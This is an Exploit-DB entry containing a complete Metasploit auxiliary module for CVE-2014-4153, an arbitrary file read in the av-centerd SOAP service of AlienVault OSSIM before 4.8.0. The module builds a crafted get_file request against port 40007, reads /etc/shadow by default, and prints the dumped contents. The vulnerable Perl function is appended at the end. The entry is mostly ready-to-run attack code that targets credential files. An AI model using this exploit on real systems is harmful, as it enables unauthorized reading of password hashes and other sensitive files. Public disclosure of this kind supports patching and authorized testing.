Alienvault Open Source SIEM (OSSIM) < 4.8.0 - 'get_file' Information Disclosure (Metasploit)

2014-06-13T00:00:00
ID EDB-ID:42695
Type exploitdb
Reporter Exploit-DB
Modified 2014-06-13T00:00:00

Description

Alienvault Open Source SIEM (OSSIM) < 4.8.0 - 'get_file' Information Disclosure (Metasploit). CVE-2014-4153. Remote exploit for Linux platform

                                        
                                            require 'msf/core'

class MetasploitModule &lt; Msf::Auxiliary

	include Msf::Exploit::Remote::HttpClient

	def initialize
		super(
			'Name'        =&gt; 'Alienvault OSSIM av-centerd Util.pm get_file Information Disclosure',
			'Description' =&gt; %q{
				This module exploits an information disclosure vulnerability found within the get_file
				function in Util.pm. The vulnerability exists because of an unsanitized $r_file parameter
				that allows for the leaking of arbitrary file information.
			},
			'References'  =&gt;
			[
				[ 'CVE', '2014-4153' ],
				[ 'ZDI', '14-207' ],
				[ 'URL', 'http://forums.alienvault.com/discussion/2806' ],
			],
			'Author'      =&gt; [ 'james fitts' ],
			'License'     =&gt; MSF_LICENSE,
			'DisclosureDate' =&gt; 'Jun 13 2014')

		register_options([
			Opt::RPORT(40007),
			OptBool.new('SSL',   [true, 'Use SSL', true]),
			OptString.new('FILE', [ false, 'This is the file to download', '/etc/shadow'])
		], self.class)
	
	end

	def run

		soap =  "&lt;?xml version=\"1.0\" encoding=\"UTF-8\"?&gt;\r\n"
		soap += "&lt;soap:Envelope xmlns:soap=\"http:\/\/schemas.xmlsoap.org/soap/envelope/\"\r\n"
		soap += "xmlns:soapenc=\"http:\/\/schemas.xmlsoap.org\/soap\/encoding/\" xmlns:xsd=\"http:\/\/www.w3.org\/2001\/XMLSchema\"\r\n"
		soap += "xmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\r\n"
		soap += "soap:encodingStyle=\"http:\/\/schemas.xmlsoap.org\/soap\/encoding\/\"&gt;\r\n"
		soap += "&lt;soap:Body&gt;\r\n"
		soap += "&lt;get_file xmlns=\"AV\/CC\/Util\"&gt;\r\n"
		soap += "&lt;c-gensym3 xsi:type=\"xsd:string\"&gt;All&lt;/c-gensym3&gt;\r\n"
		soap += "&lt;c-gensym5 xsi:type=\"xsd:string\"&gt;423d7bea-cfbc-f7ea-fe52-272ff7ede3d2&lt;/c-gensym5&gt;\r\n"
		soap += "&lt;c-gensym7 xsi:type=\"xsd:string\"&gt;#{datastore['RHOST']}&lt;/c-gensym7&gt;\r\n"
		soap += "&lt;c-gensym9 xsi:type=\"xsd:string\"&gt;#{Rex::Text.rand_text_alpha(4 + rand(4))}&lt;/c-gensym9&gt;\r\n"
		soap += "&lt;c-gensym11 xsi:type=\"xsd:string\"&gt;#{datastore['FILE']}&lt;/c-gensym11&gt;\r\n"
		soap += "&lt;/get_file&gt;\r\n"
		soap += "&lt;/soap:Body&gt;\r\n"
		soap += "&lt;/soap:Envelope&gt;\r\n"

		res = send_request_cgi(
			{
				'uri'	=&gt;	'/av-centerd',
				'method'	=&gt;	'POST',
				'ctype'		=&gt;	'text/xml; charset=UTF-8',
				'data'		=&gt;	soap,
				'headers'	=&gt;	{
					'SOAPAction'	=&gt;	"\"AV/CC/Util#get_file\""
				}
			}, 20)

		if res && res.code == 200
			print_good("Dumping contents of #{datastore['FILE']} now...")
			data = res.body.scan(/(?&lt;=xsi:type="soapenc:Array"&gt;&lt;item xsi:type="xsd:string"&gt;)[\S\s]+&lt;\/item&gt;&lt;item xsi:type="xsd:string"&gt;/)
			puts data[0].split("&lt;")[0]
		else
			print_bad("Something went wrong...")
		end

	end

end
__END__

/usr/share/alienvault-center/lib/AV/CC/Util.pm

sub get_file {
    my ( $funcion_llamada, $nombre, $uuid, $admin_ip, $hostname, $r_file )
        = @_;
    my $file_content;

    verbose_log_file(
        "GET FILE      : Received call from $uuid : ip source = $admin_ip, hostname = $hostname :($funcion_llamada,$nombre,$r_file)"
    );

    if ($r_file =~  /[;`\$\&lt;\&gt;\|]/) {
        console_log_file("Not allowed r_file: $r_file in get_file\n");
        my @ret = ("Error");
        return \@ret;
    }

    if ( !-f "$r_file" ) {
        #my @ret = ("Error");
        verbose_log_file("Error file $r_file not found!");
        # Return empty file if not exists
        my @ret = ( "", "d41d8cd98f00b204e9800998ecf8427e", "$systemuuid" );
        return \@ret;
    }

    my $md5sum = `md5sum $r_file | awk {'print \$1'}` if ( -f "$r_file" );

    if ( open( my $ifh, $r_file ) ) {

        binmode($ifh);
        $file_content = do { local $/; &lt;$ifh&gt; };
        close($ifh);

        my @ret = ( "$file_content", "$md5sum", "$systemuuid" );
        return \@ret;

    }
    else {
        my @ret = ("Error");
        verbose_log_file("Error file $r_file not found!");
        return \@ret;

    }

}